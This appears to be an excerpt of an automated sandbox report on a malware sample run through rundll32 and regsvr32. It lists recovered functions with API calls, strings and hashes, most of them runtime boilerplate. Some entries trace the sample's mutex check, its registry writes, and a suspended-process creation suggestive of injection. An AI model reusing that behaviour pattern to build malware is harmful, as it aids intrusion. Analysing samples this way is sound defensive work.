                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: c30f9b567104404dfa8ae9d4df645edb39a04e41f82f7852530594daf0097da2
                          • Instruction ID: 8a9dd7038f33dcf1bd7a92af22f95d711d07eae44bddefa1f9fd5bda63df9031
                          • Opcode Fuzzy Hash: c30f9b567104404dfa8ae9d4df645edb39a04e41f82f7852530594daf0097da2
                          • Instruction Fuzzy Hash: C551D3756083069FDB168F20D990BAA77B9EF08314F10853DEE03C72A9D739E851C791
                          APIs
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • GetLastError.KERNEL32 ref: 7FAD4753
                          • __dosmaperr.LIBCMT ref: 7FAD475A
                          • GetLastError.KERNEL32(?,?,?,?), ref: 7FAD4794
                          • __dosmaperr.LIBCMT ref: 7FAD479B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 205a0f80856a9c2ddc27d671197828cf8527b91eb51457dabe6d0e894a745c4b
                          • Instruction ID: f25a9bfa4fddc404feb59273131b5b7cac6e1140e50008794cdc8c406fcdc06d
                          • Opcode Fuzzy Hash: 205a0f80856a9c2ddc27d671197828cf8527b91eb51457dabe6d0e894a745c4b
                          • Instruction Fuzzy Hash: 5621B075608305EFD7118F76C98495BB7BAFF492647104599FC669B25CDB38FC008B50
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3945016288d2dcfde4e005cafe3da8d2a1a9840d356e486c62dc01fae8f7b20c
                          • Instruction ID: a9986fd089c3559709215faf918ecd0ea8e15868c2d718a4309de075c151de64
                          • Opcode Fuzzy Hash: 3945016288d2dcfde4e005cafe3da8d2a1a9840d356e486c62dc01fae8f7b20c
                          • Instruction Fuzzy Hash: 7921C0352043A5AFDB029FB5CD80E5A77AEEF042647005529FD16EB268EB38FC51D7A0
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 7FAD5605
                            • Part of subcall function 7FAD439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7FAD4226,?,00000000,-00000008), ref: 7FAD4449
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FAD563D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7FAD565D
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 6391fecc80515c5d02f25e0281213e92ab951cda9330182307eaf337a46be150
                          • Instruction ID: 66c3c6d692dd4f3e49dac446ea0b86ddae88538946c4f862d04493e1e993d5cd
                          • Opcode Fuzzy Hash: 6391fecc80515c5d02f25e0281213e92ab951cda9330182307eaf337a46be150
                          • Instruction Fuzzy Hash: 8F1126BA909305BEEB021BB64D8DCAF7ABCCE591A53180124F906D610CFF3CED0186B4
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000), ref: 7FADC3F0
                          • GetLastError.KERNEL32(?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?,?,?,7FAD8D75,?), ref: 7FADC3FC
                            • Part of subcall function 7FADC3C2: CloseHandle.KERNEL32(FFFFFFFE,7FADC40C,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?,?), ref: 7FADC3D2
                          • ___initconout.LIBCMT ref: 7FADC40C
                            • Part of subcall function 7FADC384: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7FADC3B3,7FADBCE5,?,?,7FAD87EE,?,?,00000000,?), ref: 7FADC397
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,7FADBCF8,?,00000001,?,?,?,7FAD87EE,?,?,00000000,?), ref: 7FADC421
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 7f42a484c1fee0033e97d1f9bd1f4f6030498f5abe1801fab3145f14774b164c
                          • Instruction ID: 426ea828ca856fed72087b9e9d106e04e963393e43cc1c2f9a5771e9954360a0
                          • Opcode Fuzzy Hash: 7f42a484c1fee0033e97d1f9bd1f4f6030498f5abe1801fab3145f14774b164c
                          • Instruction Fuzzy Hash: 2BF01C7F500214BBCF121FA2DC09EC97F6AFB483B0B584021FE099A124D63689329BD0
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          • Opcode ID: 1aa46d6682d56efa9de95d442115b426db274812f65fece85fc646247afdba00
                          • Instruction ID: bd580126d8d992bad4960fb194b831cbfeb8b8e68fedb382326839ab999e817f
                          • Opcode Fuzzy Hash: 1aa46d6682d56efa9de95d442115b426db274812f65fece85fc646247afdba00
                          • Instruction Fuzzy Hash: FBA1E234E01259EECF01CF78C8506EE7BB5EF49725F048659E86AAB399D238E502CB50
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7FA93FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          • Opcode ID: 3ba5f65279a86b87e52da5ec5e5d7baca1e839107f9631471fba461c9d4d72ef
                          • Instruction ID: 32a7663e0445163c79880c28695e01e41fa9aba79abf3b85cd9e2bc8352d915e
                          • Opcode Fuzzy Hash: 3ba5f65279a86b87e52da5ec5e5d7baca1e839107f9631471fba461c9d4d72ef
                          • Instruction Fuzzy Hash: D5A1F174D05258DFCB14CFA8C990AEEBBB5BF49300F1081A9E959AB354DB346A44CF90
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 7FAC11DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 62cf9ab8820d68c8a1b5bd1f9f453e451ecdf64a13b70799d2e710168ae14af0
                          • Instruction ID: 19c7dfbb41d5dbd4f82694df699b52da02a8d3e6101e744aebbd20e9ce2d0998
                          • Opcode Fuzzy Hash: 62cf9ab8820d68c8a1b5bd1f9f453e451ecdf64a13b70799d2e710168ae14af0
                          • Instruction Fuzzy Hash: CF417F36A00209AFDF02CF94CD81ADEBBB5FF48324F148069F906A7264D339E951DB50
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7FA77DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7FA77E6F
                            • Part of subcall function 7FABCB02: _Yarn.LIBCPMT ref: 7FABCB21
                            • Part of subcall function 7FABCB02: _Yarn.LIBCPMT ref: 7FABCB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 87b421e668195a1392fec4642af8e179e61b4fa6d09f3aa4a10415143ec2ee4b
                          • Instruction ID: 693ec5f1036f896538a896af005808075848b1be17a91232fb1c6879098a12a8
                          • Opcode Fuzzy Hash: 87b421e668195a1392fec4642af8e179e61b4fa6d09f3aa4a10415143ec2ee4b
                          • Instruction Fuzzy Hash: 5F4127B4D05289DFDB01CFA8C950BAEFBF1BF49304F148298D414AB385C77AA901CBA5

                          Execution Graph

                          Execution Coverage:1%
                          Dynamic/Decrypted Code Coverage:97.4%
                          Signature Coverage:0%
                          Total number of Nodes:116
                          Total number of Limit Nodes:1
                          Execution graph (graph rendering not reproduced)

                          Control-flow Graph (function 7F052A30; graph rendering not reproduced)
                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7F05346D
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0

                          Control-flow Graph (function 7F07AFE0; graph rendering not reproduced)
                          APIs
                            • Part of subcall function 7F053490: __aullrem.LIBCMT ref: 7F0534E5
                            • Part of subcall function 7F047920: CreateMutexA.KERNEL32(00000000,00000001,7F07B249,?,?,7F07B249,?), ref: 7F04792C
                          • ExitProcess.KERNEL32 ref: 7F07B252
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0

                          Control-flow Graph

                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7F07B249,?,?,7F07B249,?), ref: 7F04792C
                          • GetLastError.KERNEL32(?,?,7F07B249), ref: 7F04793F
                          • CloseHandle.KERNEL32(00000000,?,?,7F07B249), ref: 7F047950
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0
                          APIs
                            • Part of subcall function 7F08EB5C: GetLastError.KERNEL32(?,00000008,7F09360A), ref: 7F08EB60
                            • Part of subcall function 7F08EB5C: SetLastError.KERNEL32(00000000,00000000,00000009,000000FF), ref: 7F08EC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7F08F5A2,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7F09701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F08F5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7F097047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F0971AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 607553120-905460609
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7F07BB99
                          • wsprintfW.USER32 ref: 7F07BBE6
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7F07BC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7F07BC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7F07BC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7F07BC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7F07BC68
                            • Part of subcall function 7F07C347: GetTickCount.KERNEL32 ref: 7F07C365
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$CountCreateOpenTickwsprintf
                          • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                          • API String ID: 730945307-550109914
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7F080F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7F08103E
                          • CatchIt.LIBVCRUNTIME ref: 7F08108F
                          • _UnwindNestedFrames.LIBCMT ref: 7F081190
                          • CallUnexpected.LIBVCRUNTIME ref: 7F0811AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 4119006552-393685449
                          APIs
                          • GetCurrentProcess.KERNEL32(?), ref: 7F07BDA9
                          • IsWow64Process.KERNEL32(00000000), ref: 7F07BDB0
                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7F07BDEC
                          • wsprintfW.USER32 ref: 7F07BE7A
                          • CloseHandle.KERNEL32(00000000), ref: 7F07C005
                          • CloseHandle.KERNEL32(00000000), ref: 7F07C010
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
                          • String ID: 0x%x$?
                          • API String ID: 3386633596-4137330559
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F84B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C3F84BF
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F8548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C3F8573
                          • _ValidateLocalCookies.LIBCMT ref: 6C3F85C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233507615.000000006C3D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C3D0000, based on PE: true
                          • Associated: 00000009.00000002.2233472664.000000006C3D0000.00000002.00000001.01000000.00000007.sdmp
                          • Associated: 00000009.00000002.2233547351.000000006C403000.00000002.00000001.01000000.00000007.sdmp
                          • Associated: 00000009.00000002.2233588519.000000006C411000.00000004.00000001.01000000.00000007.sdmp
                          • Associated: 00000009.00000002.2233738983.000000006C879000.00000004.00000001.01000000.00000007.sdmp
                          • Associated: 00000009.00000002.2233777208.000000006C87B000.00000002.00000001.01000000.00000007.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_6c3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm$v?l
                          • API String ID: 1170836740-1277278303
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7F07DBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7F07DBC0
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7F090DA9,7F08DD78,0000000C,7F0A2040,00000000,00000000,?,7F090FF6,00000021,FlsSetValue,7F0AA8C0,7F0AA8C8,7F0A2040), ref: 7F090D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7F08BED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7F08BEE7
                          • swprintf.LIBCMT ref: 7F08BF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7F08BF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7F08BEFD
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7F035C07
                          • int.LIBCPMTD ref: 7F035C20
                            • Part of subcall function 7F03AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7F03AD26
                            • Part of subcall function 7F03AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7F03AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7F035C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7F035CFB
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7F081BA3,00000000,?,00000001,?,?,?,7F081C92,00000001,FlsFree,7F0A7E5C,FlsFree), ref: 7F081BFF
                          • GetLastError.KERNEL32(?,7F081BA3,00000000,?,00000001,?,?,?,7F081C92,00000001,FlsFree,7F0A7E5C,FlsFree,00000000,?,7F080BAF), ref: 7F081C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7F081C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7F053FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7F037DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7F037E6F
                            • Part of subcall function 7F07CB02: _Yarn.LIBCPMT ref: 7F07CB21
                            • Part of subcall function 7F07CB02: _Yarn.LIBCPMT ref: 7F07CB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7f020000_regsvr32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554